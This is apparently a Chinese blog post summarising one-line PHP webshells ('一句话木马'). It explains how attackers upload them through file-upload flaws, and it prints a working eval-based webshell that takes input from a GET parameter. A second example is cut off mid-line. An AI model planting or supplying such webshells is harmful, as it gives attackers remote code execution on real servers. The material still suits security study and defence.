PHP小马总结
程序员文章站
2022-07-12 15:11:36
...
利用文件上传漏洞,往目标网站中上传一句话木马,只要攻击者满足三个条件,就能实现成功入侵。
(1)木马上传成功,未被杀;
(2)知道木马的路径在哪;
(3)上传的木马能正常运行。
我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。
所以看到的经典一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数据的部分。
1.最简单的应用
<?php @eval($_GET["code"])?>
<?php @eval($_POST上一篇: jq 命令解析报错